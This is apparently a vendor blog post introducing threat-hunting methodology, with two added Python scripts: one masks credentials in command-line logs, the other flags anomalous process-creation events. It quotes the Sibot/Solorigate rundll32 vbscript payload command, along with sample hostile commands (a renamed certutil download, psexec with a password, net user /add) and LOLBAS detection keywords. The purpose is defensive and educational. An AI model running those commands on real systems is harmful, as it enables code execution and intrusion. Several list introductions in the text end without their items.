We could start this article with a bold statement saying that Threat Hunting is easier than you think, and by reading our blog post, you will instantly become a pro. Unfortunately or luckily, that’s not the case. However, we understand that starting out as a Cyber Threat Hunter is tough. That’s why we are introducing a series of guides on Threat Hunting Basics.
Preventive measures are not a panacea for an impenetrable defense. That’s where threat hunting comes into play. However, where do you start? In this blog, we’ll take a closer look at threat hunting methodologies, particularly threat hunting techniques and threat hunting tactics.
Threat hunting tactics refer to the fundamental approach a Cyber Threat Hunter leverages for both reactive and proactive threat hunting.
Target-driven threat hunting works well for initial data collection while focusing on a particular threat you try to find in your environment, such as:
A data-driven approach turns the target-driven hunting on its head. You collect data, analyze it, and define what to hunt for, depending on the items of interest and available data. A data set that allows detection of one or more threats may be a good starting point.
Data-driven threat hunting allows organizations to focus on what they have today. In contrast, target-driven threat hunting typically identifies gaps in data that may require additional resources to capture. The best threat hunting teams tend to use both tactics.
Generally, adversaries take the path of least resistance to achieve their goals. Like any human, they make mistakes, leave evidence, and recycle techniques. You can use that to your advantage. With that said, let’s dive into the basic threat hunting methodology for effective hunts.
While this step might seem obvious, you’ll be surprised to know how many organizations aren’t even aware of the exact number of their endpoints. Before getting into the threat hunting techniques, you should ask yourself the following questions:
The fundamental part of any threat hunt is data. Data sources can be active or passive: active sources are alerts produced by someone else’s research and detection logic (for example, a detection of mimikatz), while passive sources are raw telemetry recorded regardless of whether anything was detected.
Both types of data have value. However, for a Cyber Threat Hunter, passive data sources are more useful because they provide complete visibility without relying on someone else’s research and detection logic (their bias).
Another challenge is managing the cost of data collection, which might be a real pain. Applying a ‘greedy’ approach might leave you without the required logs. And yes, you also need historical events. General advice is to keep at least a year of logs. However, it depends on the compliance, industry specifics, and your organization’s strategy. Note that passive data sources will be more expensive to collect than active sources.
Perhaps one of the most important passive data sources to collect is process creation. Process creation events can help cover detection for more than two-thirds of the existing MITRE ATT&CK techniques. Some might argue that gathering process creation events leads to password leakages. However, you lose more by not collecting these logs, and there are workarounds to avoid a possible exposure of sensitive data. Process creation is also supported out of the box on Windows and Linux systems. In addition, enriched logs from EDR sources or Microsoft’s Sysmon are very common.
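One of the workarounds mentioned above is to mask credential-like arguments in the command line before the event is stored or forwarded, so you keep the process creation telemetry without keeping the password. The script below is an added example, not SOC Prime’s code: the set of patterns (`/password:`, `-p`, `net user`, `net use`, `ConvertTo-SecureString`) and the sample events are constructed for illustration and are not an exhaustive list.

```python
import re

MASK = "<REDACTED>"

# Command-line shapes that commonly carry a credential. This list is an
# assumption for the example; extend it for the tools used in your environment.
SECRET_PATTERNS = [
    # --password=Secret, /pwd:Secret, -p Secret, -pass Secret
    re.compile(r'(?i)((?:--|-|/)(?:password|passwd|pwd|pass|p)(?:[=: ]))(\S+)'),
    # net user <name> <password> [/add]   (the query form "net user <name>" has no password)
    re.compile(r'(?i)(\bnet(?:\d)?\s+user\s+\S+\s+)(?!/)(\S+)'),
    # net use [drive:] \\host\share <password> /user:...
    re.compile(r'(?i)(\bnet\s+use\s+(?:\S+\s+)?\\\\\S+\s+)(?!/)(\S+)'),
    # PowerShell: ConvertTo-SecureString [-String] "<secret>" -AsPlainText
    re.compile(r'''(?i)(ConvertTo-SecureString\s+(?:-String\s+)?)(["']?[^"' ]+["']?)'''),
]


def redact_command_line(cmdline: str) -> str:
    """Return cmdline with credential-like arguments replaced by MASK.

    Only the value is masked; the switch or verb stays so the hunter can
    still see that a credential was passed on the command line.
    """
    for pat in SECRET_PATTERNS:
        cmdline = pat.sub(lambda m: m.group(1) + MASK, cmdline)
    return cmdline


def redact_events(events):
    """Apply redaction to a list of process-creation events (dicts with 'command_line')."""
    return [dict(ev, command_line=redact_command_line(ev["command_line"])) for ev in events]


# Constructed sample events; hosts and values are made up for this example.
SAMPLE_EVENTS = [
    {"host": "WS01", "command_line": "psexec \\\\srv01 -u admin -p Hunter2! cmd"},
    {"host": "WS01", "command_line": "cmd.exe /c net user backup P@ssw0rd /add"},
    {"host": "WS02", "command_line": "whoami /all"},
    {"host": "WS02", "command_line": 'powershell -c "$s = ConvertTo-SecureString -String Hunter2! -AsPlainText -Force"'},
]

if __name__ == "__main__":
    for ev in redact_events(SAMPLE_EVENTS):
        print(ev["host"], ev["command_line"])
```

The redaction is lossy by design: it keeps the evidence that a credential was passed on the command line (which is itself a finding worth hunting) while dropping the secret, so the trade-off is a few false positives on unusual argument shapes rather than stored passwords.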
Every cyber attack is a process, and it is far from being random. That’s why the concept of a kill chain exists. Kill chain refers to the steps adversaries take to achieve their goals. If you’re new to threat hunting, relying on your intuition and think-like-an-adversary approach might not be the best idea. However, trying to analyze attack vectors and different APTs is a great place to start.
Adversaries can’t snap their fingers to ‘own’ your systems. Generally, they must take a series of actions towards reaching their objective(s). Most of the time, this involves steps like gaining a foothold, establishing persistence, elevating permissions, lateral movement, etc.
There are certain types of attack that may allow an adversary to skirt some or even all of these measures. For instance:
First, check one of the frameworks (MITRE ATT&CK, Cyber Kill Chain, etc.) and take a deeper look at it to understand what might be behind an attack. Of course, there is no universal matrix that can be applied to every case, but every framework has a similar approach to the attack vectors description.
When you are familiar with the kill chain, think of what techniques and sub-techniques you should cover in the first place. Trying to cover all of the techniques might be your first intention, but, most likely, this won’t work because it is pricey, time-consuming, and still doesn’t protect your system completely.
To avoid the unnecessary fuss, keep in mind the following ideas:
When you’ve collected your logs, it’s time to analyze them. As a Cyber Threat Hunter, you shouldn’t only be good at code writing, because working with data is essential. Practice makes perfect, but what matters is who you learn from. Based on our Threat Hunters’ experience, we’ve collected the following tips for you.
The following suggestions can significantly improve your threat hunting process:
… process creation) in one report.csv, and give it to your analysts or analyze it yourself. You might feel like trying to find your way through 2 million alerts is too much. However, it won’t usually take more than a few hours, even with a couple of million alerts.
Process creation auditing is your best way to go, even for zero days and supply chain attacks. As we’ve mentioned before, only gathering these events will cover most of the techniques.
Remember that not every behavior is cataloged in MITRE ATT&CK. For example, keep in mind short file names (e.g., 1.pst) or suspicious paths, such as C:\windows\temp. According to Florian Roth, you should also pay attention to the following anomalies:
- renamed system tools (e.g., certutil.exe as %temp%\cu.exe)
- shells and script interpreters (cmd.exe, powershell.exe)
- renamed tools with short names (e.g., PsExec.exe as C:\p.exe)
- execution from unusual locations (C:\Users\Public, C:\Perflogs, etc.)
- a .dll download from a .onion domain

When the preparation is over (you know your infrastructure well, you have the data you need, and you’ve analyzed it), you can start the hunt. Detecting advanced attacks might seem complicated, but it gets much easier with the right telemetry. Remember that even advanced adversaries rely on recycled tactics, techniques, and procedures (TTPs).
Still doubting? Then, here is a representative example of the Solarwinds supply chain attack that remained undiscovered for around a year.
Almost every attack has more plausible and more difficult things to detect. In the Solorigate example, you can see some advanced and novel techniques that are complicated (not impossible, though) to hunt against, such as:
On the other hand, there are more trivial techniques and methods to hunt for:
The following script didn’t necessarily have to be malicious. However, if you see rundll32.exe running vbscript:"\ , you should pay attention to this and at least check if it has run before in your environment. Even though the adversaries did some extremely advanced stuff, they still used the well-known LOLBAS “Rundll32”.
Rundll32.exe vbscript:"\..\mshtml,RunHTMLApplication "+Execute (CreateObject("Wscript.Shell").RegRead("HKLM\SOFTWARE\MICROSOFT\Windows\CurrentVersion\sibot\")) (window.close)
What do we see here?
- Rundll32 executing an inline vbscript: payload
- “Rundll32” run with known LOLBAS arguments

Again, this could easily be detected if you had the right telemetry. Not to mention that before the attack disclosure, we had a rule in the SOC Prime Platform that would generate an alert based on Rundll32.exe and RunHTMLApplication.
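The anomalies listed earlier (short file names, suspicious paths, renamed tools) and the Rundll32 case above are all questions you can ask of process creation telemetry with a few lines of code. The script below is an added example written for this post, not SOC Prime’s rule or the Platform’s logic: it runs those checks over a constructed sample of Sysmon-style events (Image, OriginalFileName, CommandLine) and also answers the “has it run before in your environment?” question by comparing each command line against a constructed history. Host names, paths and the history are made up; the rundll32 command line is the one quoted above; %temp% is assumed to expand to the user’s AppData\Local\Temp.

```python
import ntpath
from collections import Counter

# Constructed sample of process-creation events (Sysmon-style fields).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\cmd.exe", "original_file_name": "Cmd.Exe",
     "command_line": "cmd.exe /c whoami"},
    {"host": "WS01", "image": r"C:\Users\alice\AppData\Local\Temp\cu.exe", "original_file_name": "CertUtil.exe",
     "command_line": "cu.exe -urlcache -f http://example.invalid/a.txt a.txt"},
    {"host": "WS02", "image": r"C:\p.exe", "original_file_name": "PsExec.exe",
     "command_line": r"p.exe \\WS03 cmd"},
    {"host": "WS02", "image": r"C:\Users\Public\1.exe", "original_file_name": "1.exe",
     "command_line": "1.exe"},
    {"host": "WS03", "image": r"C:\Windows\System32\rundll32.exe", "original_file_name": "RUNDLL32.EXE",
     "command_line": 'rundll32.exe vbscript:"\\..\\mshtml,RunHTMLApplication "+Execute '
                     '(CreateObject("Wscript.Shell").RegRead("HKLM\\SOFTWARE\\MICROSOFT\\Windows'
                     '\\CurrentVersion\\sibot\\")) (window.close)'},
    {"host": "WS03", "image": r"C:\Windows\System32\rundll32.exe", "original_file_name": "RUNDLL32.EXE",
     "command_line": "rundll32.exe shell32.dll,Control_RunDLL"},
]

# Constructed baseline: command lines already seen in the environment before the hunt.
HISTORY = ["cmd.exe /c whoami", "rundll32.exe shell32.dll,Control_RunDLL"]

# Locations from the post plus the expansion of %temp% (assumed).
SUSPICIOUS_DIRS = (r"c:\windows\temp", r"c:\users\public", r"c:\perflogs", r"\appdata\local\temp")
# Rundll32 arguments that mark the LOLBAS usage seen in the Sibot command line.
RUNDLL32_MARKERS = ("runhtmlapplication", "vbscript:", "javascript:")


def normalize(cmd: str) -> str:
    """Case-fold and collapse whitespace so trivially different spellings compare equal."""
    return " ".join(cmd.lower().split())


def hunt(events, history):
    """Run the anomaly checks over events; return one finding dict per hit."""
    seen = Counter(normalize(c) for c in history)
    findings = []

    def flag(ev, category, detail):
        findings.append({"host": ev["host"], "category": category, "detail": detail})

    for ev in events:
        image = ev["image"]
        name = ntpath.basename(image).lower()          # on-disk file name
        stem = name.rsplit(".", 1)[0]                  # file name without extension
        orig = ev.get("original_file_name", "").lower()  # name compiled into the PE
        cmd = ev["command_line"]

        # Renamed tool: the PE says it is certutil/psexec but it runs under another name.
        if orig and orig != name:
            flag(ev, "renamed_tool", f"{name} is really {orig}")
        # Short file names such as 1.exe or p.exe.
        if len(stem) <= 2:
            flag(ev, "short_name", name)
        # Execution from a directory where legitimate binaries rarely live.
        if any(d in image.lower() for d in SUSPICIOUS_DIRS):
            flag(ev, "suspicious_path", image)
        # Rundll32 run with known LOLBAS arguments.
        if name == "rundll32.exe" and any(m in cmd.lower() for m in RUNDLL32_MARKERS):
            flag(ev, "rundll32_lolbas", cmd)
        # Never seen in the environment before: check whether it has run before.
        if seen[normalize(cmd)] == 0:
            flag(ev, "first_seen", cmd)
    return findings


def summarize(findings):
    """Count findings per category (useful as the first view over a large report)."""
    return dict(Counter(f["category"] for f in findings))


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS, HISTORY):
        print(f["host"], f["category"], f["detail"])
    print(summarize(hunt(SAMPLE_EVENTS, HISTORY)))
```

The benign rundll32.exe shell32.dll,Control_RunDLL line and the plain cmd.exe whoami produce no findings, while the Sibot command line is flagged twice (LOLBAS arguments and never seen before); that is the behavior-based, long-lived detection the post argues for, as opposed to matching a hash of one sample.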
For more examples, you can watch a webinar prepared by our Threat Hunting Engineering Lead Adam Swan, where he analyzes multiple attacks and the detections that could have been used.
Are IOC-based rules effective? Yes, but not always. The issue with them is that IOC-report releases often take longer than the cybersecurity reality allows. In addition, most likely, IPs, hashes, domains, and tools won’t be reused. Whereas a threat hunting query built to identify unusual rundll32 activity may be useful for decades instead of days/weeks/months. So, opt for behavior-based rules for a more long-lasting effect.
Of course, timely and high-quality IOC-based rules can be handy. Often IOC-based detections are best used retroactively to see if you were targeted in the past instead of detecting current attacks. In the end, you shouldn’t forget about the Pyramid of Pain when approaching threat hunting and incident response.
Being a Cyber Threat Hunter is probably one of the most creative roles in cybersecurity, even though it is based on analysis. To keep on with the pace of the industry, you should always get additional knowledge, insights, and inspiration. Here are a few ideas that could enrich your threat hunting process:
Threat Hunting might be overwhelming and challenging, but it’s worth it. Learn, practice, and be curious. And we’ll try to make your path smoother with our guides on Threat Hunting Basics.